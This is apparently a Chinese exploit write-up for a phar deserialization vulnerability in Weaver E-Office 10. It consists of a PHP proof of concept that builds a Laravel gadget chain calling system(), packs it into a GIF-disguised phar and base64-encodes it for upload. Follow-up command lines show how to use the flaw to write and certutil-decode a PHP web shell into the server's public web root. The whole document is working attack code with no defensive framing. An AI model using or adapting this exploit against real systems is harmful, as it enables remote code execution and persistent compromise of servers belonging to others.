泛微 E-Office 10 atuhfile phar 反序列化漏洞

<?php  declare(strict_types=1);namespace IlluminateBroadcasting {  class PendingBroadcast {    protected $events;    protected $event;    public function __construct($events, $event) {      $this->events = $events;      $this->event = $event;    }  }  class BroadcastEvent {    protected $connection;    public function __construct($connection) {      $this->connection = $connection;    }  }}namespace IlluminateBus {  class Dispatcher {    protected $queueResolver;    public function __construct($queueResolver) {      $this->queueResolver = $queueResolver;    }  }}namespace {  $command = new IlluminateBroadcastingBroadcastEvent("whoami");    $dispatcher = new IlluminateBusDispatcher("system");  $pendingBroadcast = new IlluminateBroadcastingPendingBroadcast($dispatcher, $command);  // 临时文件路径  $tempPharPath = 'phar.phar';  // 创建 Phar  $phar = new Phar($tempPharPath);  $phar->startBuffering();  $phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");  $phar->addFromString('test.txt', 'test');  $phar->setMetadata($pendingBroadcast);  $phar->stopBuffering();  $pharData = file_get_contents($tempPharPath);  $base64PharData = base64_encode($pharData);  $base64OutputFilePath = 'phar_base64.txt';  file_put_contents($base64OutputFilePath, $base64PharData);  unset($phar);   unlink($tempPharPath);  echo "Base64编码的Phar数据已写入到当前目录文件 {$base64OutputFilePath}";}

// 第1个是写入php代码,我这里写的是phpinfo的base64编码$command = new IlluminateBroadcastingBroadcastEvent("echo PD9waHAgcGhwaW5mbygpOyA/Pg== > ../www/eoffice10/server/public/shell.php");// 第2个是进行base64解码$command = new IlluminateBroadcastingBroadcastEvent('certutil -decode ../www/eoffice10/server/public/shell.php ../www/eoffice10/server/public/shell2.php');